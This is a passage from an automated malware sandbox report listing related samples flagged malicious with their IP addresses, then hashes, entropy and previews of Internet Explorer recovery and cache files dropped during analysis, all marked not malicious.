                  10ba8cb2_by_Libranalysis.exeGet hashmaliciousBrowse
                  • 185.68.93.43
                  9paqej8Ylo.exeGet hashmaliciousBrowse
                  • 31.41.44.202

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{230EFA06-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):7168
                  Entropy (8bit):2.8422761351495693
                  Encrypted:false
                  SSDEEP:96:rZyNBiNB4sA9J3dbp3d30cp3W3FdsA9s30igp3d30cp3W3F37M30ix1993d3bb:r8N8N+BuPBzqnE
                  MD5:91215A677A78CF1F56C00A0746E12C9D
                  SHA1:C9FE55A00E7C53C8DAB0E927B20DCDB11FAA8D9C
                  SHA-256:1DD9F6DBBE534A07F84E605C1BE0DEBD275103D4AA6A15E9455943D37802BC9D
                  SHA-512:9EE2F06478B51B7B38E4DE1D4E0AB2C8FFD4D6A74D65DC8F2B71E9580158D4105953E280F0DDEC0BCBB6910657A472009B3A85110AD8946D7707E67148710615
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...............................................................................................................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t...............................................................................................................O._.T.S.B.#.o.O.I.9.J.6.7.B.G.Q.6.e.z.0.u.4.Y.t.7.Q.=.=.........:.......................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{3EF5FA34-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):7168
                  Entropy (8bit):2.8436831003719587
                  Encrypted:false
                  SSDEEP:96:6BgnB6OJuyzP5NTP53xTPI3tduyW35hTP53xTPI3tN1C3NhFv33y55:hI
                  MD5:A2B34F3791709A881C7D99F7BB1A8D1C
                  SHA1:6E06A75275E4A9F55683BCFC831B9C6494904702
                  SHA-256:D7602F136C404B04A4E1DFD73C351A4D8D8E12EFB52F82153CB16F1AE6865985
                  SHA-512:39301B64830BC13743A1358D2862BC122CF7238BBDAB4667ED6FFC8FFDE14DEFD5B682668DF9A08E8A13C7EEB76D5CBB5DF8C1ED986C80A4C9C6FF4C672763E6
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...........................................................................................!...................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t...............................................................................................................O._.T.S.N.f.r.1.P.t.J.6.7.B.G.Q.6.e.z.0.u.4.Y.t.7.Q.=.=.........:.......................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5307E237-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):7168
                  Entropy (8bit):2.8378504865162175
                  Encrypted:false
                  SSDEEP:96:l7TH+/xQGVPLJ1PL311Pw3s2dQGQ3syk1PL311Pw3s2LvW3Lsxhp3JhPP:lk86
                  MD5:BCA39666CE6AB260B738D05CA744CA55
                  SHA1:DD613BD6C63322BF0BEE1BDC2EF544FAD9E308B7
                  SHA-256:EC29E925496035F90C14E33BDF52C0AB94E9701732E41152782B3E3DDC806A5F
                  SHA-512:B317F2FDC268FE04CF096EDA53918FCFFD1F2666B74A56D601E4C24A3906A28C38FA06537A6F583048C10105EE24A76BDD43BA814880812D0128D2ECC7F69081
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................H"...................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t...............................................................................................................O._.T.S.O.O.I.H.U.9.J.6.7.B.G.Q.6.e.z.0.u.4.Y.t.7.Q.=.=.........:.......................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{61A0A537-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):7168
                  Entropy (8bit):2.8394778196103725
                  Encrypted:false
                  SSDEEP:96:UlJWNx8+t3R7N3R3wkN3c3dd8+iZ3wKON3R3wkN3c3d3bCZ3wKxJx3R177:Tak
                  MD5:7A76FAFFF4B405EF3090816FED72197F
                  SHA1:3EDAD020EE6665C0B437E9A58C37A0552BD8C1C7
                  SHA-256:4935751D3961D1F2731D57B494A3979450BF0D4A439101424728C5812F3C451A
                  SHA-512:2094F8F563FDE381881171DBB5D9235F9A5D6E7F0405CAE9D7A49507F9E46ECA225592957A4DE7FBE5AF802DD3B12B0F5D72D6FAE1373206E5AA8CB7E2B1D6AE
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................p:.>..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t...............................................................................................................O._.T.S.O.K.W.g.Y.d.J.6.7.B.G.Q.6.e.z.0.u.4.Y.t.7.Q.=.=.........:.......................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{230EFA08-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.619527580284413
                  Encrypted:false
                  SSDEEP:48:rbGO5HGIzjEQyCzWA2SBljyNy6H8EfzjEQyCzWA2BljyNy6H8E:l5nz4Izb2mjkyxsz4IzbCjkyx
                  MD5:2650FDA23F8754B3CDC0462834884B48
                  SHA1:D4C58B11F508A466F57AB6B12D084C58351C3D7F
                  SHA-256:9A09F4B8A362CF59B5ED625F0D58E8189E1C24C5772A93E3E72B3D9D08C89E4C
                  SHA-512:247359FB49F2583979C8A74B147CB3EB380C9E871F1CD56D91F73B2DFC28A04A3CDF7E567D85BF7C4848D679A112D8BEF8706D7E2AF6BDCBB1B7B0FDC0E00428
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...........................................................................................&...................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{230EFA0A-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.643601359218418
                  Encrypted:false
                  SSDEEP:48:rGGDjGIcvELTeaYxCHT8McvELTeqCHT8:pyaY6gMy3g
                  MD5:52FDA0ECE5BBD10C6547D76070A1FA8E
                  SHA1:2C76386FC0DB64C40F38320B738D8B275A4594F6
                  SHA-256:A795DED09691F63FF7F8B516A5F8FB10B69BA554FDE5D4B34734AE07E152007A
                  SHA-512:F49C810DD649DD8E7F24D13E3738FC2E3C02D23EEE9A753C426091DA3FF4ACAFFBA396E25055C850AB7F482D3D722927BBB16FAFE11EDD7D77265E9AA6917EBF
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................@B....................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................,.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{230EFA0C-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.6430303445146546
                  Encrypted:false
                  SSDEEP:24:rOGsGK9lBXslMYzPWE1bMrlQZ0HlAwXfRJyvR4+gi9lRXslMYzPWE1trlQZ0HlAQ:rOGsGIXEvLZqXfvyvvXEv0ZqXfvyv
                  MD5:8886B1546BAFFC51BAEB31272E3435A4
                  SHA1:682C17F34D4D5C15636B88E1D11863DC8F572809
                  SHA-256:E6157D18E00A74E3EEA85BCA896BAAC0311F3D814CE8032905780CA7B52054F1
                  SHA-512:A230AD4FC10AD4C77D952F324C18D35FFCFD6828B13897DF60E83D45EA380D0E85D63239A0809DFF5644187070DBDDFF2B5513B2162BD515B893981B8889F170
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...............................................................................................................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................,.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{230EFA0E-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.649319825910071
                  Encrypted:false
                  SSDEEP:24:r7GGGK9lBJslMibEHTzAb9taO3zRQPR3ii9lRJslMibEHTzAb9tWB3zRQPR3i:r7GGGIJEr9zR6HJErGzR6
                  MD5:8E3296AEF84F98D1E520EC67FE8DAAC5
                  SHA1:056103B8B29A2691BDBFB47DF53BAF5A00D9FE74
                  SHA-256:A468FF03A263A692202CA04CFAE36238D824784CBC8A8EEEA029C5F14B999B5F
                  SHA-512:8B6DE9DC7CA8AFD85B9B359E868EF63C3505DD7645B25D3E9591F364FD7851CDA142CCCA8E9236D961C3503C06858FD8F0D6273C0787C78E88FDADE1A7D22417
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y......................................................................................... .....................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................,.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{3EF5FA36-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.6439505840090733
                  Encrypted:false
                  SSDEEP:96:GrPPrJqgKaazP15VTuWPrJqgKaau15VTu:GrPPrJvGdb9PrJvvb
                  MD5:E513EE38E69669E88979C863A30A0AA0
                  SHA1:17DD854637F41D752B440D7F6287A0BD574B716C
                  SHA-256:864B3321075B3B6048F5206FFC1FDD24948BE3C5A5AE662F2287C1275FB91912
                  SHA-512:4A37CF6260A473717593224776B07355C65037F8098666914985ECECC660171E9197BD951624FD340134475C0F524293F7CBC2EC1341F7EABD611ABEFF0FE0B3
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y......................................................................................... .<...................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................0.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{3EF5FA38-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.644501368353259
                  Encrypted:false
                  SSDEEP:48:rtBrGwHGIFJN9EA7rdUe05vCubPzEn+OTFJN9EA7rdUeUA5vCubPzEn+O:BBpHFJ4srdhgvLbPuzFJ4srdh/vLbPu
                  MD5:D1DE093D301E3171AE592742113F290A
                  SHA1:4DC9756FA7864691E086B4E4E752CEB4DEDBEAA2
                  SHA-256:43FBE3C87E02FA1C749386E05E7463050CF8FCFB1068094FED116DA2BCDC97FC
                  SHA-512:20D0291A1069881ED9F4D6D1841177A569687E82DE4BCA93D0582EE806F7CCDE9200BFE9B1F3E67AE6837DF603553C187E67F84635DDF22680DF0D430CF31610
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...........................................................................................!...................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................,.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{3EF5FA3A-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.647289310233475
                  Encrypted:false
                  SSDEEP:48:rfAGnG2+uNUbEASjjcjQd0DkTYEuNUbEASjjjjQd0DkTY:rF+udfPIkTYEudfPdkTY
                  MD5:F50CD6A3B7AA3290B722B65C9996349C
                  SHA1:7C036E62FACA71CE75B245C4CE660C20B57DFD04
                  SHA-256:FC77DE4EA50485C30C26C89E1DC4166616FDFF0EAB331792890CCE867C9B8E4A
                  SHA-512:54F76C73A87300BF0289E1B6EE46C5CDD7FED8ECA6B8DB8BD7F6ED6E1708D8191AC06C98E1AC6D95CBC6E550352A98A7AC8A1BCD7F6E711DF3DA5E2731FA89EA
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................U....................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................<.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{3EF5FA3C-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.620393355939478
                  Encrypted:false
                  SSDEEP:48:rKGOVGItNEbEAl8TlKZS4qhOyWtNEbEAl8elKZS4qhOy:olt2wtk4it2w2k4
                  MD5:A3B9D48028933EC8A71940CE8CBE07F7
                  SHA1:3187F579C93CD679395DB0EF9B3B6F46ACC08A72
                  SHA-256:013A3EE6E3EC34C5F462B0397ED9FDA37A7AC273CAF7D8B082B17190928DB87E
                  SHA-512:55088D5F96764E21BB3153E261F02E42351474441D4AF971111B2AFADED5814446AE5122D1D17356C231E75968C14FBA77C4285F604631051F726486753E9240
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................PI....................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5307E239-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5632
                  Entropy (8bit):2.5767651762314236
                  Encrypted:false
                  SSDEEP:48:rxjGwGbWbynNXS2byyTH4onNXS2byyTH4:RynhS83nhS8
                  MD5:34DAECE91A8D67359B7E0320F05C9103
                  SHA1:74686297030C49DC154E30E45D30CE2D1759F960
                  SHA-256:57108AD7B5B0696E9514DFF86B1F51598BC0A7A4FB4679678D724DA2EB9FEB9A
                  SHA-512:DEA199FE8B9B91474C461A7BA59BD47745032F5D8326E3D9AF80C9B98F15E173F776E3CEE8F258A05DAF4E9E532CCA61833C7FD00F2A99371B02764C9309C683
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................i....................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................<.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5307E23B-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.6563600041266815
                  Encrypted:false
                  SSDEEP:48:ruGUGHhNExZHKwNkRgvCchNExZHKfNkRgv:FhkSgzhbSg
                  MD5:BDBFB2E37DA68771CED9A97179A65E9B
                  SHA1:57E9788175206893CBECC54ACE30098216749A8F
                  SHA-256:6D0513B73FA2CB769AE40CDB1C4366FEE71DC2E99FEE3DE631A330DC9EC13CDD
                  SHA-512:EE231B8175D84E10DEB4091D71230184EC2E122D60CCB78764A5947FDCA4F208D8C1129CC7DC3445D05F64355509DC88160421FC533CAB9004E9232D684EF831
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................T....................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................8.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5307E23D-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.655738831049053
                  Encrypted:false
                  SSDEEP:48:rpGRG2+UNUGppDqjyL0XseNUNUGppDqmyL0Xse:y+U2GK1U2tK
                  MD5:DBF458279342C29D14FD91535FD96DB9
                  SHA1:929FBB8569F20BEA3005E98542D308D55FDF1194
                  SHA-256:F7B8C65CE67504422EED35587E002BBFDF97F7FCD301038D2BB4600C5DF4137F
                  SHA-512:8E0F75EB1D6983A493C5AACB52DCDC9195426E2E1A74DC8C686CC85D3AC6A5E857F7328933A50CFB39493589683F9463C595077B3839579B5C0932676D94B0D5
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..............................................................................................................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................<.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5307E23F-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.63110531836346
                  Encrypted:false
                  SSDEEP:48:r3GOGO17NUI4173PI3QKnIGl5lh7NUI41W3PI3QKnIGl5l:H17xgoxlF7ygoxl
                  MD5:2E38BE64347354EF4820070EB5FF50A6
                  SHA1:8357B893F3D7EA086C89EEA1F1C87D213079F767
                  SHA-256:6A5F0B4820426EF6A77C6C396F011D7898DFE1A41DA23C4CCBE977F36BC93C59
                  SHA-512:78C4D38CB8F5002A516943758BF9480A0A1C9001A0FE9DAE6EED604B9E572936F09C6C807D71A51253E168D441B5F2D012973991C976244C38A11452F07212BD
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................0....................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................$.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{61A0A539-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.3000853655984947
                  Encrypted:false
                  SSDEEP:24:r1AGjGi9lRxNslRV6UP9juPwd14BlV6UlU+nfVJA:rqGjG0xNER0UJzQDVPl
                  MD5:EF2E5FE62CE986A29E6DAAD6D794D5C4
                  SHA1:E6B3F0B1F7953A6E72245B3037BB4FA49B7E484B
                  SHA-256:BFBD1EF9C4422998E89893D2BE2D8E02A0D0B6F89373DEB096D2866A0F081732
                  SHA-512:9875B60622C2245D749C3CC2E2AB3D881756FC7C60B7D469730511C4A79A642A895D7CDBEB0FC7D9C03991E59CA406C7E101B14235D8874988E2CC73474E8BC7
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................."a(..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................$.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{61A0A53B-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.3058141640301404
                  Encrypted:false
                  SSDEEP:24:rKGGG2j9l2aNbFdHbbz8xkoG9GxPMN3wYuFQHgYau:rKGGG2qaNbFx+G98SOFQHd
                  MD5:4621B34D663456CEBEEAF0E2647C7F16
                  SHA1:D203587EB7E4B2CD5CCADF585689E196BFE96B82
                  SHA-256:C4B6F4344419E989637FD2493324224A5878EE823D7E64F25093EE34995A07DE
                  SHA-512:74A0C94792CE15799A2F223F16A0F419C6E7B232190B90813115DE1EBFFA9FC387D2AB9A4C17B7206E4EEAF24A214F0A322ABEAE857652DC4D73A66BBAD46E96
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...........................................................................................X*..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................,.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{61A0A53D-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.2999943562063536
                  Encrypted:false
                  SSDEEP:24:r6GyGi9lR/N91ISvsiR+T89gPMJ4nM8Wtn:r6GyG0/N9zqT8mUM8
                  MD5:84BB57AE19AD13A58850A8A36B570A07
                  SHA1:9384F8B4360A52746DF666569B20075F7B0E2155
                  SHA-256:57F453F3E810E68389366958A9D3626274A6EA9942F3FC039F41C40A6D749AE2
                  SHA-512:46FBD9E634238BA895C357316466EADA5A08938FBB2CDBE926B9E90A5FFBACE6284F2568BA7680E243440D35C51FED271220A0C74DF520ECE9E86189CC3D294B
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y......................................................................................... ..<..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................$.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{61A0A53F-7AD2-11EC-90E9-ECF4BB862DED}.dat

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.289314617607263
                  Encrypted:false
                  SSDEEP:24:rAGOu60GK9lx6/NJVeYfQ8YhahIc7qLVX2iS7fjmDx+T:rAGOOG86/NJVeYdhT7AVX2iu7mDE
                  MD5:24598DF0D2E57C73F5C66AF6CFA8751A
                  SHA1:2E61FF48854D30EE26DFD7EC1F4BFEADF6B0085B
                  SHA-256:A0C8F979959F3E99EB86DE8B20E0C124E8FD208F83BE69BCC4D8737D83C73701
                  SHA-512:C71B43102B2381BADE219F10EA9FB48E6E36B4960293FB21CABA951370D1F320119626FE78140DD5BFCADEC8E3C8995BE24C441306D8531DAD656927F6A2DAA9
                  Malicious:false
                  Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................@.L=..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\NewErrorPageTemplate[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1612
                  Entropy (8bit):4.869554560514657
                  Encrypted:false
                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                  MD5:DFEABDE84792228093A5A270352395B6
                  SHA1:E41258C9576721025926326F76063C2305586F76
                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                  Malicious:false
                  Preview:.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\NewErrorPageTemplate[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1612
                  Entropy (8bit):4.869554560514657
                  Encrypted:false
                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                  MD5:DFEABDE84792228093A5A270352395B6
                  SHA1:E41258C9576721025926326F76063C2305586F76
                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                  Malicious:false
